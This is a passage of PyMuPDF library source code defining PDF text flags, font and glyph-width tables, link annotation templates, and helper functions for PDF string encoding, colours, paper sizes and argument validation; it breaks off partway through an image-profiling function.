| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_PRESERVE_IMAGES
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
TEXTFLAGS_XHTML = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_PRESERVE_IMAGES
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
TEXTFLAGS_XML = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
TEXTFLAGS_TEXT = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
# ------------------------------------------------------------------------------
# Simple text encoding options
# ------------------------------------------------------------------------------
TEXT_ENCODING_LATIN = 0
TEXT_ENCODING_GREEK = 1
TEXT_ENCODING_CYRILLIC = 2
# ------------------------------------------------------------------------------
# Stamp annotation icon numbers
# ------------------------------------------------------------------------------
STAMP_Approved = 0
STAMP_AsIs = 1
STAMP_Confidential = 2
STAMP_Departmental = 3
STAMP_Experimental = 4
STAMP_Expired = 5
STAMP_Final = 6
STAMP_ForComment = 7
STAMP_ForPublicRelease = 8
STAMP_NotApproved = 9
STAMP_NotForPublicRelease = 10
STAMP_Sold = 11
STAMP_TopSecret = 12
STAMP_Draft = 13
# ------------------------------------------------------------------------------
# Base 14 font names and dictionary
# ------------------------------------------------------------------------------
Base14_fontnames = (
"Courier",
"Courier-Oblique",
"Courier-Bold",
"Courier-BoldOblique",
"Helvetica",
"Helvetica-Oblique",
"Helvetica-Bold",
"Helvetica-BoldOblique",
"Times-Roman",
"Times-Italic",
"Times-Bold",
"Times-BoldItalic",
"Symbol",
"ZapfDingbats",
)
Base14_fontdict = {}
for f in Base14_fontnames:
Base14_fontdict[f.lower()] = f
del f
Base14_fontdict["helv"] = "Helvetica"
Base14_fontdict["heit"] = "Helvetica-Oblique"
Base14_fontdict["hebo"] = "Helvetica-Bold"
Base14_fontdict["hebi"] = "Helvetica-BoldOblique"
Base14_fontdict["cour"] = "Courier"
Base14_fontdict["coit"] = "Courier-Oblique"
Base14_fontdict["cobo"] = "Courier-Bold"
Base14_fontdict["cobi"] = "Courier-BoldOblique"
Base14_fontdict["tiro"] = "Times-Roman"
Base14_fontdict["tibo"] = "Times-Bold"
Base14_fontdict["tiit"] = "Times-Italic"
Base14_fontdict["tibi"] = "Times-BoldItalic"
Base14_fontdict["symb"] = "Symbol"
Base14_fontdict["zadb"] = "ZapfDingbats"
annot_skel = {
"goto1": "<</A<</S/GoTo/D[%i 0 R/XYZ %g %g %g]>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",
"goto2": "<</A<</S/GoTo/D%s>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",
"gotor1": "<</A<</S/GoToR/D[%i /XYZ %g %g %g]/F<</F(%s)/UF(%s)/Type/Filespec>>>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",
"gotor2": "<</A<</S/GoToR/D%s/F(%s)>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",
"launch": "<</A<</S/Launch/F<</F(%s)/UF(%s)/Type/Filespec>>>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",
"uri": "<</A<</S/URI/URI(%s)>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",
"named": "<</A<</S/Named/N/%s/Type/Action>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",
}
class FileDataError(RuntimeError):
    """Raised for documents with file structure issues."""
    pass
# NOTE(review): deliberately shadows the builtin FileNotFoundError (which
# derives from OSError, not RuntimeError) - confirm callers rely on the
# RuntimeError base before renaming.
class FileNotFoundError(RuntimeError):
    """Raised if file does not exist."""
    pass
class EmptyFileError(FileDataError):
    """Raised when creating documents from zero-length data."""
    pass
# propagate exception class to C-level code, so the extension raises the
# same FileDataError type that Python callers catch
_set_FileDataError(FileDataError)
def css_for_pymupdf_font(
    fontcode: str, *, CSS: OptStr = None, archive: AnyType = None, name: OptStr = None
) -> str:
    """Create @font-face items for the given fontcode of pymupdf-fonts.

    Adds @font-face support for fonts contained in package pymupdf-fonts.
    Creates a CSS font-family for all fonts starting with string 'fontcode'.

    Note:
        The font naming convention in package pymupdf-fonts is "fontcode<sf>",
        where the suffix "sf" is either empty or one of "it", "bo" or "bi",
        i.e. the regular, italic, bold and bold-italic variants of a font.
        For example, font code "notos" refers to fonts
        "notos" - "Noto Sans Regular"
        "notosit" - "Noto Sans Italic"
        "notosbo" - "Noto Sans Bold"
        "notosbi" - "Noto Sans Bold Italic"
        This function creates one CSS @font-face definition per variant and
        collectively assigns the font-family name "notos" (or 'name') to them.
        All fitting font buffers of the pymupdf-fonts package are added to
        the archive provided as parameter.
        To use the font in fitz.Story, execute 'set_font(fontcode)'. The
        correct font weight (bold) or style (italic) is selected automatically.

    Args:
        fontcode: (str) font code selecting the font variants to include.
            A maximum of 4 font variants is accepted.
        CSS: (str) CSS string to add @font-face definitions to.
        archive: (Archive, mandatory) where to place the font buffers.
        name: (str) use this as family-name instead of 'fontcode'.
    Returns:
        Modified CSS, with appended @font-face statements for each variant.
        Font buffers associated with "fontcode" are added to 'archive'.
    """
    # @font-face template string
    CSSFONT = "\n@font-face {font-family: %s; src: url(%s);%s%s}\n"

    # was `not type(archive) is Archive`: isinstance also admits subclasses
    if not isinstance(archive, Archive):
        raise ValueError("'archive' must be an Archive")
    if CSS is None:  # was `== None`
        CSS = ""

    # select font codes starting with the passed-in string
    font_keys = [k for k in fitz_fontdescriptors.keys() if k.startswith(fontcode)]
    if not font_keys:  # was `== []`
        raise ValueError(f"No font code '{fontcode}' found in pymupdf-fonts.")
    if len(font_keys) > 4:
        raise ValueError("fontcode too short")
    if name is None:  # use this name for font-family
        name = fontcode

    for fkey in font_keys:
        font = fitz_fontdescriptors[fkey]
        bold = font["bold"]  # determine font property
        italic = font["italic"]  # determine font property
        fbuff = font["loader"]()  # load the fontbuffer
        archive.add(fbuff, fkey)  # update the archive
        bold_text = "font-weight: bold;" if bold else ""
        italic_text = "font-style: italic;" if italic else ""
        CSS += CSSFONT % (name, fkey, bold_text, italic_text)
    return CSS
def get_text_length(text: str, fontname: str ="helv", fontsize: float =11, encoding: int =0) -> float:
    """Calculate length of a string for a built-in font.

    Args:
        fontname: name of the font.
        fontsize: font size points.
        encoding: encoding to use, 0=Latin (default), 1=Greek, 2=Cyrillic.
    Returns:
        (float) length of text.
    """
    key = fontname.lower()
    basename = Base14_fontdict.get(key, None)
    # Symbol / ZapfDingbats carry their own glyph width tables.
    glyph_table = {"Symbol": symbol_glyphs, "ZapfDingbats": zapf_glyphs}.get(basename)
    if glyph_table is not None:
        widths = (
            glyph_table[ord(c)][1] if ord(c) < 256 else glyph_table[183][1]
            for c in text
        )
        return sum(widths) * fontsize
    if key in Base14_fontdict.keys():
        return util_measure_string(
            text, Base14_fontdict[key], fontsize, encoding
        )
    # CJK fonts: every glyph occupies one full em.
    if key in {
        "china-t",
        "china-s",
        "china-ts",
        "china-ss",
        "japan",
        "japan-s",
        "korea",
        "korea-s",
    }:
        return len(text) * fontsize
    raise ValueError("Font '%s' is unsupported" % key)
# ------------------------------------------------------------------------------
# Glyph list for the built-in font 'ZapfDingbats'
# ------------------------------------------------------------------------------
zapf_glyphs = (
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(32, 0.278),
(33, 0.974),
(34, 0.961),
(35, 0.974),
(36, 0.98),
(37, 0.719),
(38, 0.789),
(39, 0.79),
(40, 0.791),
(41, 0.69),
(42, 0.96),
(43, 0.939),
(44, 0.549),
(45, 0.855),
(46, 0.911),
(47, 0.933),
(48, 0.911),
(49, 0.945),
(50, 0.974),
(51, 0.755),
(52, 0.846),
(53, 0.762),
(54, 0.761),
(55, 0.571),
(56, 0.677),
(57, 0.763),
(58, 0.76),
(59, 0.759),
(60, 0.754),
(61, 0.494),
(62, 0.552),
(63, 0.537),
(64, 0.577),
(65, 0.692),
(66, 0.786),
(67, 0.788),
(68, 0.788),
(69, 0.79),
(70, 0.793),
(71, 0.794),
(72, 0.816),
(73, 0.823),
(74, 0.789),
(75, 0.841),
(76, 0.823),
(77, 0.833),
(78, 0.816),
(79, 0.831),
(80, 0.923),
(81, 0.744),
(82, 0.723),
(83, 0.749),
(84, 0.79),
(85, 0.792),
(86, 0.695),
(87, 0.776),
(88, 0.768),
(89, 0.792),
(90, 0.759),
(91, 0.707),
(92, 0.708),
(93, 0.682),
(94, 0.701),
(95, 0.826),
(96, 0.815),
(97, 0.789),
(98, 0.789),
(99, 0.707),
(100, 0.687),
(101, 0.696),
(102, 0.689),
(103, 0.786),
(104, 0.787),
(105, 0.713),
(106, 0.791),
(107, 0.785),
(108, 0.791),
(109, 0.873),
(110, 0.761),
(111, 0.762),
(112, 0.762),
(113, 0.759),
(114, 0.759),
(115, 0.892),
(116, 0.892),
(117, 0.788),
(118, 0.784),
(119, 0.438),
(120, 0.138),
(121, 0.277),
(122, 0.415),
(123, 0.392),
(124, 0.392),
(125, 0.668),
(126, 0.668),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(161, 0.732),
(162, 0.544),
(163, 0.544),
(164, 0.91),
(165, 0.667),
(166, 0.76),
(167, 0.76),
(168, 0.776),
(169, 0.595),
(170, 0.694),
(171, 0.626),
(172, 0.788),
(173, 0.788),
(174, 0.788),
(175, 0.788),
(176, 0.788),
(177, 0.788),
(178, 0.788),
(179, 0.788),
(180, 0.788),
(181, 0.788),
(182, 0.788),
(183, 0.788),
(184, 0.788),
(185, 0.788),
(186, 0.788),
(187, 0.788),
(188, 0.788),
(189, 0.788),
(190, 0.788),
(191, 0.788),
(192, 0.788),
(193, 0.788),
(194, 0.788),
(195, 0.788),
(196, 0.788),
(197, 0.788),
(198, 0.788),
(199, 0.788),
(200, 0.788),
(201, 0.788),
(202, 0.788),
(203, 0.788),
(204, 0.788),
(205, 0.788),
(206, 0.788),
(207, 0.788),
(208, 0.788),
(209, 0.788),
(210, 0.788),
(211, 0.788),
(212, 0.894),
(213, 0.838),
(214, 1.016),
(215, 0.458),
(216, 0.748),
(217, 0.924),
(218, 0.748),
(219, 0.918),
(220, 0.927),
(221, 0.928),
(222, 0.928),
(223, 0.834),
(224, 0.873),
(225, 0.828),
(226, 0.924),
(227, 0.924),
(228, 0.917),
(229, 0.93),
(230, 0.931),
(231, 0.463),
(232, 0.883),
(233, 0.836),
(234, 0.836),
(235, 0.867),
(236, 0.867),
(237, 0.696),
(238, 0.696),
(239, 0.874),
(183, 0.788),
(241, 0.874),
(242, 0.76),
(243, 0.946),
(244, 0.771),
(245, 0.865),
(246, 0.771),
(247, 0.888),
(248, 0.967),
(249, 0.888),
(250, 0.831),
(251, 0.873),
(252, 0.927),
(253, 0.97),
(183, 0.788),
(183, 0.788),
)
# ------------------------------------------------------------------------------
# Glyph list for the built-in font 'Symbol'
# ------------------------------------------------------------------------------
symbol_glyphs = (
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(32, 0.25),
(33, 0.333),
(34, 0.713),
(35, 0.5),
(36, 0.549),
(37, 0.833),
(38, 0.778),
(39, 0.439),
(40, 0.333),
(41, 0.333),
(42, 0.5),
(43, 0.549),
(44, 0.25),
(45, 0.549),
(46, 0.25),
(47, 0.278),
(48, 0.5),
(49, 0.5),
(50, 0.5),
(51, 0.5),
(52, 0.5),
(53, 0.5),
(54, 0.5),
(55, 0.5),
(56, 0.5),
(57, 0.5),
(58, 0.278),
(59, 0.278),
(60, 0.549),
(61, 0.549),
(62, 0.549),
(63, 0.444),
(64, 0.549),
(65, 0.722),
(66, 0.667),
(67, 0.722),
(68, 0.612),
(69, 0.611),
(70, 0.763),
(71, 0.603),
(72, 0.722),
(73, 0.333),
(74, 0.631),
(75, 0.722),
(76, 0.686),
(77, 0.889),
(78, 0.722),
(79, 0.722),
(80, 0.768),
(81, 0.741),
(82, 0.556),
(83, 0.592),
(84, 0.611),
(85, 0.69),
(86, 0.439),
(87, 0.768),
(88, 0.645),
(89, 0.795),
(90, 0.611),
(91, 0.333),
(92, 0.863),
(93, 0.333),
(94, 0.658),
(95, 0.5),
(96, 0.5),
(97, 0.631),
(98, 0.549),
(99, 0.549),
(100, 0.494),
(101, 0.439),
(102, 0.521),
(103, 0.411),
(104, 0.603),
(105, 0.329),
(106, 0.603),
(107, 0.549),
(108, 0.549),
(109, 0.576),
(110, 0.521),
(111, 0.549),
(112, 0.549),
(113, 0.521),
(114, 0.549),
(115, 0.603),
(116, 0.439),
(117, 0.576),
(118, 0.713),
(119, 0.686),
(120, 0.493),
(121, 0.686),
(122, 0.494),
(123, 0.48),
(124, 0.2),
(125, 0.48),
(126, 0.549),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(160, 0.25),
(161, 0.62),
(162, 0.247),
(163, 0.549),
(164, 0.167),
(165, 0.713),
(166, 0.5),
(167, 0.753),
(168, 0.753),
(169, 0.753),
(170, 0.753),
(171, 1.042),
(172, 0.713),
(173, 0.603),
(174, 0.987),
(175, 0.603),
(176, 0.4),
(177, 0.549),
(178, 0.411),
(179, 0.549),
(180, 0.549),
(181, 0.576),
(182, 0.494),
(183, 0.46),
(184, 0.549),
(185, 0.549),
(186, 0.549),
(187, 0.549),
(188, 1),
(189, 0.603),
(190, 1),
(191, 0.658),
(192, 0.823),
(193, 0.686),
(194, 0.795),
(195, 0.987),
(196, 0.768),
(197, 0.768),
(198, 0.823),
(199, 0.768),
(200, 0.768),
(201, 0.713),
(202, 0.713),
(203, 0.713),
(204, 0.713),
(205, 0.713),
(206, 0.713),
(207, 0.713),
(208, 0.768),
(209, 0.713),
(210, 0.79),
(211, 0.79),
(212, 0.89),
(213, 0.823),
(214, 0.549),
(215, 0.549),
(216, 0.713),
(217, 0.603),
(218, 0.603),
(219, 1.042),
(220, 0.987),
(221, 0.603),
(222, 0.987),
(223, 0.603),
(224, 0.494),
(225, 0.329),
(226, 0.79),
(227, 0.79),
(228, 0.786),
(229, 0.713),
(230, 0.384),
(231, 0.384),
(232, 0.384),
(233, 0.384),
(234, 0.384),
(235, 0.384),
(236, 0.494),
(237, 0.494),
(238, 0.494),
(239, 0.494),
(183, 0.46),
(241, 0.329),
(242, 0.274),
(243, 0.686),
(244, 0.686),
(245, 0.686),
(246, 0.384),
(247, 0.549),
(248, 0.384),
(249, 0.384),
(250, 0.384),
(251, 0.384),
(252, 0.494),
(253, 0.494),
(254, 0.494),
(183, 0.46),
)
class linkDest(object):
    """link or outline destination details"""
    def __init__(self, obj, rlink):
        # obj is a Link/Outline-like object exposing .is_external, .page, .uri
        isExt = obj.is_external
        isInt = not isExt
        self.dest = ""
        self.fileSpec = ""
        self.flags = 0
        self.isMap = False
        self.isUri = False
        self.kind = LINK_NONE
        self.lt = Point(0, 0)  # top-left target point
        self.named = ""
        self.newWindow = ""
        self.page = obj.page
        self.rb = Point(0, 0)  # bottom-right target point
        self.uri = obj.uri
        # rlink = (page, x, y) resolved destination; synthesize a '#page=' URI
        if rlink and not self.uri.startswith("#"):
            self.uri = "#page=%i&zoom=0,%g,%g" % (rlink[0] + 1, rlink[1], rlink[2])
        if obj.is_external:
            self.page = -1
            self.kind = LINK_URI
        if not self.uri:
            self.page = -1
            self.kind = LINK_NONE
        # internal destination: parse the '#page=...&zoom=...' fragment
        if isInt and self.uri:
            self.uri = self.uri.replace("&zoom=nan", "&zoom=0")
            if self.uri.startswith("#"):
                self.named = ""
                self.kind = LINK_GOTO
                m = re.match('^#page=([0-9]+)&zoom=([0-9.]+),(-?[0-9.]+),(-?[0-9.]+)$', self.uri)
                if m:
                    # page number in URI is 1-based
                    self.page = int(m.group(1)) - 1
                    self.lt = Point(float((m.group(3))), float(m.group(4)))
                    self.flags = self.flags | LINK_FLAG_L_VALID | LINK_FLAG_T_VALID
                else:
                    m = re.match('^#page=([0-9]+)$', self.uri)
                    if m:
                        self.page = int(m.group(1)) - 1
                    else:
                        # '#name' fragment without page info: a named destination
                        self.kind = LINK_NAMED
                        self.named = self.uri[1:]
            else:
                self.kind = LINK_NAMED
                self.named = self.uri
        if obj.is_external:
            # classify external target by URI scheme
            if self.uri.startswith(("http://", "https://", "mailto:", "ftp://")):
                self.isUri = True
                self.kind = LINK_URI
            elif self.uri.startswith("file://"):
                self.fileSpec = self.uri[7:]
                self.isUri = False
                self.uri = ""
                self.kind = LINK_LAUNCH
                # 'file://path#page=n' means GoToR (goto in remote file)
                ftab = self.fileSpec.split("#")
                if len(ftab) == 2:
                    if ftab[1].startswith("page="):
                        self.kind = LINK_GOTOR
                        self.fileSpec = ftab[0]
                        self.page = int(ftab[1][5:]) - 1
            else:
                # unknown scheme: treat as launchable URI
                self.isUri = True
                self.kind = LINK_LAUNCH
# -------------------------------------------------------------------------------
# "Now" timestamp in PDF Format
# -------------------------------------------------------------------------------
def get_pdf_now() -> str:
    """Return the current local time as a PDF timestamp (D:YYYYMMDDHHMMSS+-HH'MM')."""
    import time
    stamp = time.strftime("D:%Y%m%d%H%M%S", time.localtime())
    offset = time.altzone
    hours = str(abs(offset // 3600)).rjust(2, "0")
    minutes = str(abs(offset // 60) % 60).rjust(2, "0")
    suffix = "%s'%s'" % (hours, minutes)
    # PDF sign convention: west of UTC (positive altzone) is '-'.
    if offset > 0:
        stamp += "-" + suffix
    elif offset < 0:
        stamp += "+" + suffix
    return stamp
def get_pdf_str(s: str) -> str:
    """ Return a PDF string depending on its coding.

    Notes:
        Returns a string bracketed with either "()" or "<>" for hex values.
        If only ascii then "(original)" is returned, else if only 8 bit chars
        then "(original)" with interspersed octal strings \nnn is returned,
        else a string "<FEFF[hexstring]>" is returned, where [hexstring] is the
        UTF-16BE encoding of the original.
    """
    if not bool(s):
        return "()"

    def utf16be_hex(txt):
        # BOM FE FF followed by the UTF-16BE bytes, as a hex string
        data = bytearray([254, 255]) + bytearray(txt, "UTF-16BE")
        return "<" + data.hex() + ">"  # brackets indicate hex

    # Escapes for the PDF whitespace control characters.
    control_escapes = {8: "\\b", 9: "\\t", 10: "\\n", 12: "\\f", 13: "\\r"}
    pieces = []
    for ch in s:
        code = ord(ch)
        if code > 255:  # beyond 8-bit range: whole string goes UTF-16BE
            return utf16be_hex(s)
        if 31 < code < 127:  # printable ASCII
            if ch in ("(", ")", "\\"):  # these need escaping
                pieces.append("\\")
            pieces.append(ch)
        elif code > 127:  # 8-bit char: octal escape
            pieces.append("\\%03o" % code)
        else:
            # control chars: known escapes, everything else becomes 0xB7
            pieces.append(control_escapes.get(code, "\\267"))
    return "(" + "".join(pieces) + ")"
def getTJstr(text: str, glyphs: typing.Union[list, tuple, None], simple: bool, ordering: int) -> str:
    """ Return a PDF string enclosed in [] brackets, suitable for the PDF TJ
    operator.

    Notes:
        The input string is converted to either 2 or 4 hex digits per character.
    Args:
        simple: no glyphs: 2-chars, use char codes as the glyph
                glyphs: 2-chars, use glyphs instead of char codes (Symbol,
                ZapfDingbats)
        not simple: ordering < 0: 4-chars, use glyphs not char codes
                    ordering >=0: a CJK font! 4 chars, use char codes as glyphs
    """
    if text.startswith("[<") and text.endswith(">]"):  # already done
        return text
    if not bool(text):
        return "[<>]"
    if simple:  # 2-byte hex per char; 0xB7 replaces chars beyond 8 bit
        if glyphs is None:  # not Symbol/ZapfDingbats: raw char codes
            codes = ("%02x" % ord(c) if ord(c) < 256 else "b7" for c in text)
        else:  # Symbol or ZapfDingbats: glyph ids
            codes = ("%02x" % glyphs[ord(c)][0] if ord(c) < 256 else "b7" for c in text)
    elif ordering < 0:  # non-simple, not CJK: 4-byte glyph ids
        codes = ("%04x" % glyphs[ord(c)][0] for c in text)
    else:  # CJK: 4-byte char codes
        codes = ("%04x" % ord(c) for c in text)
    return "[<" + "".join(codes) + ">]"
def paper_sizes():
    """Known paper formats @ 72 dpi as a dictionary. Key is the format string
    like "a4" for ISO-A4. Value is the tuple (width, height).

    Information taken from the following web sites:
    www.din-formate.de
    www.din-formate.info/amerikanische-formate.html
    www.directtools.de/wissen/normen/iso.htm
    """
    # All values are PDF points (1/72 inch), portrait orientation.
    return {
        "a0": (2384, 3370),
        "a1": (1684, 2384),
        "a10": (74, 105),
        "a2": (1191, 1684),
        "a3": (842, 1191),
        "a4": (595, 842),
        "a5": (420, 595),
        "a6": (298, 420),
        "a7": (210, 298),
        "a8": (147, 210),
        "a9": (105, 147),
        "b0": (2835, 4008),
        "b1": (2004, 2835),
        "b10": (88, 125),
        "b2": (1417, 2004),
        "b3": (1001, 1417),
        "b4": (709, 1001),
        "b5": (499, 709),
        "b6": (354, 499),
        "b7": (249, 354),
        "b8": (176, 249),
        "b9": (125, 176),
        "c0": (2599, 3677),
        "c1": (1837, 2599),
        "c10": (79, 113),
        "c2": (1298, 1837),
        "c3": (918, 1298),
        "c4": (649, 918),
        "c5": (459, 649),
        "c6": (323, 459),
        "c7": (230, 323),
        "c8": (162, 230),
        "c9": (113, 162),
        "card-4x6": (288, 432),
        "card-5x7": (360, 504),
        "commercial": (297, 684),
        "executive": (522, 756),
        "invoice": (396, 612),
        "ledger": (792, 1224),
        "legal": (612, 1008),
        "legal-13": (612, 936),
        "letter": (612, 792),
        "monarch": (279, 540),
        "tabloid-extra": (864, 1296),
    }
def paper_size(s: str) -> tuple:
    """Return a tuple (width, height) for a given paper format string.

    Notes:
        'A4-L' will return (842, 595), the values for A4 landscape.
        Suffix '-P' and no suffix return the portrait tuple.
        Unknown formats yield (-1, -1).
    """
    token = s.lower()
    orientation = "p"
    if token.endswith("-l"):
        orientation = "l"
        token = token[:-2]
    if token.endswith("-p"):
        token = token[:-2]
    width, height = paper_sizes().get(token, (-1, -1))
    if orientation == "l":
        return (height, width)
    return (width, height)
def paper_rect(s: str) -> Rect:
    """Return a Rect for the paper size indicated in string 's'. Must conform to the argument of method 'PaperSize', which will be invoked.
    """
    # paper_size() returns (-1, -1) for unknown formats, giving a degenerate rect.
    width, height = paper_size(s)
    return Rect(0.0, 0.0, width, height)
def CheckParent(o: typing.Any):
    # Raise if object 'o' has no living parent (it is "orphaned").
    # NOTE(review): the `== None` looks deliberate, not a style slip:
    # `o.parent` may be a weakref.proxy (see annot_postprocess); comparing a
    # dead proxy raises ReferenceError, which also flags the orphan. Confirm
    # before changing this to `is None`.
    if getattr(o, "parent", None) == None:
        raise ValueError("orphaned object: parent is None")
def EnsureOwnership(o: typing.Any):
    """Raise RuntimeError unless Python still owns object 'o' (SWIG 'thisown')."""
    owned = getattr(o, "thisown", False)
    if not owned:
        raise RuntimeError("object destroyed")
def CheckColor(c: OptSeq):
    """Raise ValueError unless 'c' is falsy or a list/tuple of 1, 3 or 4
    components, each within [0, 1].
    """
    if not c:
        return
    # Conditions are ordered so len()/min()/max() only run on real sequences.
    if (
        type(c) not in (list, tuple)
        or len(c) not in (1, 3, 4)
        or min(c) < 0
        or max(c) > 1
    ):
        raise ValueError("need 1, 3 or 4 color components in range 0 to 1")
def ColorCode(c: typing.Union[list, tuple, float, None], f: str) -> str:
    """Return the PDF operator string for color 'c'; f == "c" selects the
    stroke operators (G/RG/K), anything else the fill operators (g/rg/k).
    """
    if not c:
        return ""
    if hasattr(c, "__float__"):  # a single number: gray shade
        c = (c,)
    CheckColor(c)
    count = len(c)
    if count == 1:  # gray
        comps = "%g " % c[0]
        op = "G " if f == "c" else "g "
    elif count == 3:  # RGB
        comps = "%g %g %g " % tuple(c)
        op = "RG " if f == "c" else "rg "
    else:  # CMYK
        comps = "%g %g %g %g " % tuple(c)
        op = "K " if f == "c" else "k "
    return comps + op
def JM_TUPLE(o: typing.Sequence) -> tuple:
    """Round sequence items to 5 decimals; magnitudes below 1e-4 become 0."""
    return tuple(round(v, 5) if abs(v) >= 1e-4 else 0 for v in o)
def JM_TUPLE3(o: typing.Sequence) -> tuple:
    """Round sequence items to 3 decimals; magnitudes below 1e-3 become 0."""
    return tuple(round(v, 3) if abs(v) >= 1e-3 else 0 for v in o)
def CheckRect(r: typing.Any) -> bool:
    """Check whether an object is non-degenerate rect-like.

    It must be a sequence of 4 numbers.
    """
    try:
        r = Rect(r)
    except Exception:
        # was a bare 'except:', which also swallowed SystemExit /
        # KeyboardInterrupt; any failure to build a Rect means "not rect-like"
        return False
    return not (r.is_empty or r.is_infinite)
def CheckQuad(q: typing.Any) -> bool:
    """Check whether an object is convex, not empty quad-like.

    It must be a sequence of 4 number pairs.
    """
    try:
        q0 = Quad(q)
    except Exception:
        # was a bare 'except:', which also swallowed SystemExit /
        # KeyboardInterrupt; any failure to build a Quad means "not quad-like"
        return False
    return q0.is_convex
def CheckMarkerArg(quads: typing.Any) -> tuple:
    """Normalize a text-marker argument into a sequence of quads.

    A single rect becomes a 1-tuple of its quad, a single quad a 1-tuple;
    otherwise every element of 'quads' must itself be rect- or quad-like.
    """
    if CheckRect(quads):
        return (Rect(quads).quad,)
    if CheckQuad(quads):
        return (quads,)
    for entry in quads:
        if not (CheckRect(entry) or CheckQuad(entry)):
            raise ValueError("bad quads entry")
    return quads
def CheckMorph(o: typing.Any) -> bool:
    """Validate a 'morph' argument: falsy -> False; a (point, matrix) pair
    with a 2-item point and a 6-item matrix whose shift components are zero
    -> True; anything else raises ValueError.
    """
    if not bool(o):
        return False
    is_pair = type(o) in (list, tuple) and len(o) == 2
    if not is_pair:
        raise ValueError("morph must be a sequence of length 2")
    fixpoint, matrix = o
    if len(fixpoint) != 2 or len(matrix) != 6:
        raise ValueError("invalid morph parm 0")
    if matrix[4] != 0 or matrix[5] != 0:
        raise ValueError("invalid morph parm 1")
    return True
def CheckFont(page: "struct Page *", fontname: str) -> tuple:
    """Return the entry of the page's font list whose reference name equals
    'fontname' (the entry's 5th item), or None when absent.
    """
    return next((f for f in page.get_fonts() if f[4] == fontname), None)
def CheckFontInfo(doc: "struct Document *", xref: int) -> list:
    """Return the cached font info from doc.FontInfos whose first item equals
    'xref', or None when not cached.
    """
    return next((info for info in doc.FontInfos if info[0] == xref), None)
def UpdateFontInfo(doc: "struct Document *", info: typing.Sequence):
    """Insert 'info' into doc.FontInfos, replacing the first existing entry
    with the same xref (info[0]) or appending when none exists.
    """
    xref = info[0]
    for pos, existing in enumerate(doc.FontInfos):
        if existing[0] == xref:
            doc.FontInfos[pos] = info
            return
    doc.FontInfos.append(info)
def DUMMY(*args, **kw):
    # No-op placeholder: accepts any arguments and returns None.
    return
def planish_line(p1: point_like, p2: point_like) -> Matrix:
    """Compute matrix which maps line from p1 to p2 to the x-axis, such that it
    maintains its length and p1 * matrix = Point(0, 0).

    Args:
        p1, p2: point_like
    Returns:
        Matrix which maps p1 to Point(0, 0) and p2 to a point on the x axis at
        the same distance to Point(0,0). Will always combine a rotation and a
        transformation.
    """
    start = Point(p1)
    end = Point(p2)
    return Matrix(util_hor_matrix(start, end))
def image_profile(img: typing.ByteString) -> dict:
    """ Return basic properties of an image.

    Args:
        img: bytes, bytearray, io.BytesIO object or an opened image file.
    Returns:
        A dictionary with keys width, height, colorspace.n, bpc, type, ext and size,
        where 'type' is the MuPDF image type (0 to 14) and 'ext' the suitable
        file extension.
    Raises:
        ValueError: if 'img' is none of the supported kinds.
    """
    # was `type(img) is io.BytesIO` etc.: isinstance also admits subclasses;
    # check order kept, so BytesIO is handled before the generic read() path
    if isinstance(img, io.BytesIO):
        stream = img.getvalue()
    elif hasattr(img, "read"):  # an opened (binary) file
        stream = img.read()
    elif isinstance(img, (bytes, bytearray)):
        stream = img
    else:
